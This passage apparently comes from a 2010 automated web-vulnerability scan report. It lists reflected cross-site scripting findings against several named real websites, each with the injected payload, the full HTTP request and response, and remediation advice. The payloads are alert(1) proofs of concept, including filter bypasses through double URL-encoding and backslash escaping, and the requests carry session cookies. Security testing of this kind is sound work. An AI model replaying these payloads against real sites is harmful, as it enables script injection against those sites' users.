GET /cms/servlet/cmsview/GE_Capital_Solutions/prod/4fa2d"><img%20src%3da%20onerror%3dalert(1)>16cfe0bd4c2/financial_products/all_products/real_estate.html HTTP/1.1 Host: gecapsol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=ED77F8B1A175746A840873AFE8FC931E; cms_preferred_language=en24d06;
<!DOCTYPE html PUBLIC "-//W3C//DT ...[SNIP]... <base href="http://gecapsol.com:80/cms/servlet/cmsview/GE_Capital_Solutions/prod/4fa2d"><img src=a onerror=alert(1)>16cfe0bd4c2/financial_products/all_products/real_estate.html"> ...[SNIP]...
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8baeb"-alert(1)-"58f07899312 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d068baeb"-alert(1)-"58f07899312/financial_products/all_products/third_party.html HTTP/1.1 Host: gecapsol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=ED77F8B1A175746A840873AFE8FC931E; cms_preferred_language=en24d06;
<!DOCTYPE html PUBLIC "-//W3C//DT ...[SNIP]... <link REL='stylesheet' HREF='http://gecapsol.com:80/cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d068baeb"-alert(1)-"58f07899312/shared/css/GereSite_nn.css' TYPE='text/css'> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1388c"><img%20src%3da%20onerror%3dalert(1)>8bca7ad4d94 was submitted in the REST URL parameter 6. This input was echoed as 1388c"><img src=a onerror=alert(1)>8bca7ad4d94 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d061388c"><img%20src%3da%20onerror%3dalert(1)>8bca7ad4d94/financial_products/all_products/third_party.html HTTP/1.1 Host: gecapsol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=ED77F8B1A175746A840873AFE8FC931E; cms_preferred_language=en24d06;
<!DOCTYPE html PUBLIC "-//W3C//DT ...[SNIP]... <base href="http://gecapsol.com:80/cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d061388c"><img src=a onerror=alert(1)>8bca7ad4d94/financial_products/all_products/third_party.html"> ...[SNIP]...
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9b471"-alert(1)-"e24984e6f51 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d069b471"-alert(1)-"e24984e6f51/financial_products/all_products/trans.html HTTP/1.1 Host: gecapsol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=ED77F8B1A175746A840873AFE8FC931E; cms_preferred_language=en24d06;
<!DOCTYPE html PUBLIC "-//W3C//DT ...[SNIP]... <link REL='stylesheet' HREF='http://gecapsol.com:80/cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d069b471"-alert(1)-"e24984e6f51/shared/css/GereSite_nn.css' TYPE='text/css'> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7aa5b"><img%20src%3da%20onerror%3dalert(1)>7cd4ff1a4dd was submitted in the REST URL parameter 6. This input was echoed as 7aa5b"><img src=a onerror=alert(1)>7cd4ff1a4dd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d067aa5b"><img%20src%3da%20onerror%3dalert(1)>7cd4ff1a4dd/financial_products/all_products/trans.html HTTP/1.1 Host: gecapsol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=ED77F8B1A175746A840873AFE8FC931E; cms_preferred_language=en24d06;
<!DOCTYPE html PUBLIC "-//W3C//DT ...[SNIP]... <base href="http://gecapsol.com:80/cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d067aa5b"><img src=a onerror=alert(1)>7cd4ff1a4dd/financial_products/all_products/trans.html"> ...[SNIP]...
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 760b9%2522%252dalert%25281%2529%252d%2522df8bd7fde03 was submitted in the REST URL parameter 6. This input was echoed as 760b9"-alert(1)-"df8bd7fde03 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 6 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d06760b9%2522%252dalert%25281%2529%252d%2522df8bd7fde03/index.html HTTP/1.1 Host: gecapsol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=ED77F8B1A175746A840873AFE8FC931E; cms_preferred_language=en24d06;
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 490ed"%20style%3dx%3aexpression(alert(1))%20dad755127e8 was submitted in the REST URL parameter 6. This input was echoed as 490ed" style=x:expression(alert(1)) dad755127e8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d06490ed"%20style%3dx%3aexpression(alert(1))%20dad755127e8/index.html HTTP/1.1 Host: gecapsol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=ED77F8B1A175746A840873AFE8FC931E; cms_preferred_language=en24d06;
2.130. http://guide.opendns.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://guide.opendns.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4aec9"><script>alert(1)</script>875e643c34a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4aec9\"><script>alert(1)</script>875e643c34a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
2.131. http://guide.opendns.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://guide.opendns.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a490"><script>alert(1)</script>347989f5cd5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7a490\"><script>alert(1)</script>347989f5cd5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42e23"style%3d"x%3aexpression(alert(1))"49965e6f584 was submitted in the url parameter. This input was echoed as 42e23"style="x:expression(alert(1))"49965e6f584 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /main?url=intheknowit.com%2Fmodules%2Fform.swf%3Fform%3Dform142e23"style%3d"x%3aexpression(alert(1))"49965e6f584 HTTP/1.1 Host: guide.opendns.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmx=207386316.00012306182230551517:3:3; t=0-1298937600; __kti=1289593273346,http%3A%2F%2Fideabank.opendns.com%2Fupcoming.php%3Fca37d%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253Ecc21d24e55d%3D1,; __utmxx=207386316.00012306182230551517:1773685:2592000; __utmz=1.1290365594.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __ktv=5926-ef2-1156-d97312c41bfbc05; __utma=1.298223981.1290365594.1290365594.1290365594.1; OUS=deleted; LPUID=e8216e93-d9ac-9334-2527-6e77b41b058d; __qca=P0-1533459312-1290639885715; OPENDNS_ACCOUNT=529fbcc8cec610ec6661657a296dbfc8;
Response
HTTP/1.0 200 OK Cache-Control: no-cache, must-revalidate Expires: Mon, 26 Jul 1997 05:00:00 GMT Content-Type: text/html; charset=utf-8 Pragma: no-cache P3P: policyref="http://www.opendns.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV" Set-Cookie: LPSID=41ace5bf-8828-d5c4-6d6a-d41f963d8ec1; path=/; domain=opendns.com Connection: close Date: Thu, 25 Nov 2010 03:49:38 GMT Server: OpenDNS Guide
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3a965<a>c2e9b01b0fc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /v13a965<a>c2e9b01b0fc/navbar/partenaire+tourismexchange HTTP/1.1 Host: navbar.api.canoe.ca Proxy-Connection: keep-alive Referer: http://www.packageseeker.com/exchange/en/packageSeeker/home/travelDeals.jsp Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: canoe_lang=lang%3Aen%7Ctype%3Aauto; s_cc=true; undefined_s=First%20Visit; o_dslv=First%20Visit; s_sq=%5B%5BB%5D%5D
Response
HTTP/1.1 400 Bad Request Date: Thu, 25 Nov 2010 03:27:29 GMT Server: Apache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 480
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>navbar.api.canoe.ca error - 400 Bad Request</ti ...[SNIP]... <em style="color:#888;">'v13a965<a>c2e9b01b0fc'</em> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b2562<a>1aabfbc2ad1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /v1/navbarb2562<a>1aabfbc2ad1/partenaire+tourismexchange HTTP/1.1 Host: navbar.api.canoe.ca Proxy-Connection: keep-alive Referer: http://www.packageseeker.com/exchange/en/packageSeeker/home/travelDeals.jsp Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: canoe_lang=lang%3Aen%7Ctype%3Aauto; s_cc=true; undefined_s=First%20Visit; o_dslv=First%20Visit; s_sq=%5B%5BB%5D%5D
Response
HTTP/1.1 400 Bad Request Date: Thu, 25 Nov 2010 03:27:31 GMT Server: Apache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 487
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>navbar.api.canoe.ca error - 400 Bad Request</ti ...[SNIP]... <em style="color:#888;">'navbarb2562<a>1aabfbc2ad1'</em> ...[SNIP]...
The value of REST URL parameter 3 is copied into an HTML comment. The payload 44228--><a>a37786c9b8f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /v1/navbar/partenaire+tourismexchange44228--><a>a37786c9b8f HTTP/1.1 Host: navbar.api.canoe.ca Proxy-Connection: keep-alive Referer: http://www.packageseeker.com/exchange/en/packageSeeker/home/travelDeals.jsp Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: canoe_lang=lang%3Aen%7Ctype%3Aauto; s_cc=true; undefined_s=First%20Visit; o_dslv=First%20Visit; s_sq=%5B%5BB%5D%5D
Response
HTTP/1.1 200 OK Date: Thu, 25 Nov 2010 03:27:35 GMT Server: Apache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 12713
The value of the categoryId request parameter is copied into the HTML document as plain text between tags. The payload 17e02<a>bed71d6a365 was submitted in the categoryId parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /directory.php?name=Consulting&categoryId=17e02<a>bed71d6a365 HTTP/1.1 Host: waterlookiosk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 25 Nov 2010 03:59:58 GMT Server: Apache/1.3.37 (Unix) PHP/5.2.0 mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.28 OpenSSL/0.9.7a X-Powered-By: PHP/5.2.0 Connection: close Content-Type: text/html Content-Length: 1320
mysql error: [1054: Unknown column 'a' in 'where clause'] in EXECUTE("SELECT parent_category_id FROM category WHERE category_id = 17e02<a>bed71d6a365 ORDER BY name ASC") <pre align=left>   ...[SNIP]...
The value of the categoryId request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload ee19c%3balert(1)//f7e25a8b573 was submitted in the categoryId parameter. This input was echoed as ee19c;alert(1)//f7e25a8b573 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /directory.php?name=Consulting&categoryId=228ee19c%3balert(1)//f7e25a8b573 HTTP/1.1 Host: waterlookiosk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 25 Nov 2010 03:59:58 GMT Server: Apache/1.3.37 (Unix) PHP/5.2.0 mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.28 OpenSSL/0.9.7a X-Powered-By: PHP/5.2.0 Connection: close Content-Type: text/html Content-Length: 1501
mysql error: [1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';alert(1)//f7e25a8b573 ORDER BY name ASC' at ...[SNIP]... <font face="Courier New,Courier">ADOConnection.Execute(SELECT parent_category_id FROM category WHERE category_id = 228ee19c;alert(1)//f7e25a8b573 ORDER BY name ASC, false)</font> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a333e\'%3balert(1)//af8129f7b54 was submitted in the REST URL parameter 2. This input was echoed as a333e\\';alert(1)//af8129f7b54 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /en/Torontoa333e\'%3balert(1)//af8129f7b54/x22 HTTP/1.1 Host: wikitravel.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Thu, 25 Nov 2010 02:31:10 GMT Server: Apache Set-Cookie: wikitravel_ip=127.0.0.1; path=/; domain=.wikitravel.org Content-Language: en, en Vary: Accept-Encoding Cache-Control: s-maxage=2678400, must-revalidate, max-age=0, max-age=-67940693 Expires: Mon, 29 Sep 2008 18:06:17 GMT Content-Type: text/html; charset=utf-8 X-Cache: MISS from wikitravel.org X-Cache-Lookup: MISS from wikitravel.org:80 Via: 1.0 wikitravel.org:80 (squid/2.6.STABLE6) Connection: close Set-Cookie: BIGipServerwikitravel_pool=2918912172.20480.0000; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cfc88\'%3balert(1)//970f3d6ccde was submitted in the REST URL parameter 3. This input was echoed as cfc88\\';alert(1)//970f3d6ccde in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /en/Toronto/x22cfc88\'%3balert(1)//970f3d6ccde HTTP/1.1 Host: wikitravel.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Thu, 25 Nov 2010 02:31:27 GMT Server: Apache Set-Cookie: wikitravel_ip=127.0.0.1; path=/; domain=.wikitravel.org Content-Language: en, en Vary: Accept-Encoding Cache-Control: s-maxage=2678400, must-revalidate, max-age=0, max-age=-67940710 Expires: Mon, 29 Sep 2008 18:06:17 GMT Content-Type: text/html; charset=utf-8 X-Cache: MISS from wikitravel.org X-Cache-Lookup: MISS from wikitravel.org:80 Via: 1.0 wikitravel.org:80 (squid/2.6.STABLE6) Connection: close Set-Cookie: BIGipServerwikitravel_pool=2918912172.20480.0000; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload de688\'%3balert(1)//6b3e2dc05ca was submitted in the REST URL parameter 2. This input was echoed as de688\\';alert(1)//6b3e2dc05ca in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /en/Torontode688\'%3balert(1)//6b3e2dc05ca/x22cfc88/%27%253Balert(1 HTTP/1.1 Host: wikitravel.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wikitravel_ip=127.0.0.1; __utmz=203351703.1290653470.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/8|utmcmd=referral; BIGipServerwikitravel_pool=2918912172.20480.0000; __utma=203351703.667145852.1290653464.1290653464.1290653464.1; __utmc=203351703; __utmb=203351703;
Response
HTTP/1.0 200 OK Date: Thu, 25 Nov 2010 04:00:37 GMT Server: Apache Content-Language: en, en Vary: Accept-Encoding Cache-Control: s-maxage=2678400, must-revalidate, max-age=0, max-age=-67946060 Expires: Mon, 29 Sep 2008 18:06:17 GMT Content-Type: text/html; charset=utf-8 X-Cache: MISS from wikitravel.org X-Cache-Lookup: MISS from wikitravel.org:80 Via: 1.0 wikitravel.org:80 (squid/2.6.STABLE6) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d5b81\'%3balert(1)//b53a8185f07 was submitted in the REST URL parameter 3. This input was echoed as d5b81\\';alert(1)//b53a8185f07 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /en/Toronto/x22cfc88d5b81\'%3balert(1)//b53a8185f07/%27%253Balert(1 HTTP/1.1 Host: wikitravel.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wikitravel_ip=127.0.0.1; __utmz=203351703.1290653470.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/8|utmcmd=referral; BIGipServerwikitravel_pool=2918912172.20480.0000; __utma=203351703.667145852.1290653464.1290653464.1290653464.1; __utmc=203351703; __utmb=203351703;
Response
HTTP/1.0 200 OK Date: Thu, 25 Nov 2010 04:00:48 GMT Server: Apache Content-Language: en, en Vary: Accept-Encoding Cache-Control: s-maxage=2678400, must-revalidate, max-age=0, max-age=-67946071 Expires: Mon, 29 Sep 2008 18:06:17 GMT Content-Type: text/html; charset=utf-8 X-Cache: MISS from wikitravel.org X-Cache-Lookup: MISS from wikitravel.org:80 Via: 1.0 wikitravel.org:80 (squid/2.6.STABLE6) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4aa44\'%3balert(1)//2843bd5ba94 was submitted in the REST URL parameter 4. This input was echoed as 4aa44\\';alert(1)//2843bd5ba94 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /en/Toronto/x22cfc88/%27%253Balert(14aa44\'%3balert(1)//2843bd5ba94 HTTP/1.1 Host: wikitravel.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wikitravel_ip=127.0.0.1; __utmz=203351703.1290653470.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/8|utmcmd=referral; BIGipServerwikitravel_pool=2918912172.20480.0000; __utma=203351703.667145852.1290653464.1290653464.1290653464.1; __utmc=203351703; __utmb=203351703;
Response
HTTP/1.0 200 OK Date: Thu, 25 Nov 2010 04:00:58 GMT Server: Apache Content-Language: en, en Vary: Accept-Encoding Cache-Control: s-maxage=2678400, must-revalidate, max-age=0, max-age=-67946081 Expires: Mon, 29 Sep 2008 18:06:17 GMT Content-Type: text/html; charset=utf-8 X-Cache: MISS from wikitravel.org X-Cache-Lookup: MISS from wikitravel.org:80 Via: 1.0 wikitravel.org:80 (squid/2.6.STABLE6) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload daddd\'%3balert(1)//ec3631b4d56 was submitted in the REST URL parameter 2. This input was echoed as daddd\\';alert(1)//ec3631b4d56 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
